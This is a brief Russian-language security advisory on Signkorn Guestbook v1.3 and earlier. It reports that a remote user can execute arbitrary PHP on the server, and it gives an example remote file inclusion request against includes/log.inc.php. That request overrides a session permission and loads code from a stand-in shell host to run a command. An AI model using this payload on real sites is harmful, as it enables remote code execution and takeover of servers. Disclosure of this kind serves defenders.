Программа: Signkorn Guestbook <= v1.3

Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе.

Пример:

http://sitename.com/[Script Path]/includes/log.inc.php?_SESSION[permission] =yes&dir_path=http://SHELLURL.COM?&cmd=id



Оставить мнение